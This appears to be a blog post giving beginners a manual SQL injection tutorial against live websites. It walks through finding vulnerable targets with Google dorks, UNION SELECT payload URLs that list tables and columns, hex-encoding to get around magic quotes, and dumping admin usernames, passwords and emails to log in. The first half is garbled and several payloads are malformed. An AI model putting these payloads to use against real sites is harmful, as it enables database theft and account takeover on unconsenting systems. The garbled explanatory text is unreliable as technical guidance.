Tuesday, 14 April 2020

This tutorial for beginners...

1.SQL INSERTION ATTACKS.....


let's start over here


let me explain you how to work all thing.SQL injection is a code injection technique that exploits a security ready to attack its happen in the database coating of an application. The attack is performed when user input in other incorrectly filtered for after creation plain gateway of Data type root in SQL control or user input is not completely  typed and there by unusually complete. It is an constructor of a more major class of attack that can happen though any time one programming or scripting language is root within another. SQL injection attacks are also familiar as SQL injection attacks.

whenever you need to do easily with help of tools then you read my previous tutorial using havij.

let me no you the part of game here is four steps. & nine categories .

Step 1. website Analysis

- Find a website exploits.

- Find a Verify quantity of columns.

- Find which column or victimize.

Step 2. Description Affairs.

- Discover the sql version.

-  Find the database.

Step 3.The sold part

- Find the table names.

- Find the column names.

- Displaying the column content.

- Find the admin page.



website Analysis

In order for useing exploiting a website the first step we ar injecting  into .

Find a website exploits.

website exploit can be found using google dorks (you will

must wrote to google find fresh dorks) either in google or 

with  an exploit scanner.
   
Dork are website URLs that are possible vulnerable

in sql injection these dork  look like this.

CODE.

let's say we found the page:

CODE.

http//www.shopingsite.com/page.php?id=1"

OR

http//www.shopingsite.com/page.php?id="1

OR

press enter .if this website recover an error such as the following.

CODE.

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 5

look like this mean it's vulnerable to injection


Diagnose the amount of column:

to using manual path  commands and get  sources we must required how much column here are on website.

to find the number of column  i wrote a XQuery with with increased values  beyond we get an error, like this.

CODE.

http//www.shopingsite.com/page.php?id=1 ORDER BY 1- <--no error

http//www.shopingsite.com/page.php?id=1 ORDER BY 2- <--no error

http//www.shopingsite.com/page.php?id=1 ORDER BY 3- <--no error

http//www.shopingsite.com/page.php?id=1 ORDER BY 4- <--no error

http//www.shopingsite.com/page.php?id=1 ORDER BY 5- <--ERROR


this means there are four column!

DON'T FORGET TO INCLUDE THE DOUBLE NULL (-)AFTER THE QUERY 

MAJOR PART!

Find which column are vulnerable:

we know that there are four column now we find out which one are vulnerable to injection.to do this we use UNION & SELECT 
Queries while keeping the double null (-) at the end of the string.

CODE.

http://www.shopingsite.com/php?is=1 UNION SELECT 1,2,3,4- 

Don't forget to put the extra null (-) in between the "=" sign and the value (the number)

page.php?id=1


Now after including the Query you should be able to see number somewhere on the page that seem out place those are the number of the column that are vulnerable to injection. we can use those column to pull information from the database which we will see in part two. 

Step 2. Description Affairs.


in this step we will find out how to find the database and 

what version of SQL the website is using by using queries 

to exploit the site.

Regulate the SQL version.

Discover the version of sql of the website is a very major step  
because the step you take for version 4 are completely 

different from version 5 in order to get what you wondering 

in this tutorial i will not be cowling version 4.



you will see back to the end of step than we say how to 

discover the vulnerable columns. using that information 

we can through  in sync our next query (it will using column 

as an example) the command  would look like this:

CODE.


http://www.shopingsite.com/php?is=1 UNION SELECT 1.@@version 3,4---

Since 2 is the vulnerable column, this is were we place "@@version "is version"is "version()"

if the website still does not display the version try using unhex (@@ version) which looks like this:

CODE.

http://www.shopingsite.com/php?is=1 UNION SELECT 1.unhex(hex(@@version)) 3,4--

NOTE: if this method is used here, it must be used for the rest of the injection as well.

Now that you wonder to see is something alone these lines:

CODE.

5.1.44-community-log

which is the version of the sql for the website.

NOTE:if you look version 4 and you should like to have a go at it 
how to inject into it.

Discover the database

 we use a query like the one below:

CODE:

http://www.shopingsite.com/php?is=1 UNION SELECT 1,concat(schemm _name ) 3,4 from information _schema.schemata--

this will take sometime return more result than necessary and so that is when we switchover to this query instead:

CODE:

http://www.shopingsite.com/php?is=1 UNION SELECT 1,concat(database()) 3,4--

now we want the name of database! congratulation. copy and past the name somewhere safe we'll need it for later.

Step Three - the major part

This is fun part where we will find the user name, email and password.

Discover the table name:

So first we found the table name to use a query that is same to the one use for found database with a little bit extra added on

CODE:


http://www.shopingsite.com/php?id=1 UNION SELECT 1.group _ concert(table_name) 3,4 from information schema . table  schema=database()--







It may look long and confusing but once you understand it, it really isn't so. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue

You now have all the table names!

Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s),

tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex.

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.

2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".

Hex/Char Converter

http://www.swingnote.com/tools/texttohex.php

3. Click convert.

4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon ( which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.

Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:

Code:

http://www.thesite.com/admin

http://www.thesite.com/adminlogin

http://www.thesite.com/modlogin

http://www.thesite.com/moderator

Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program

Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time! 







































No comments:

nkjlfnernfgne

Note: only a member of this blog may post a comment.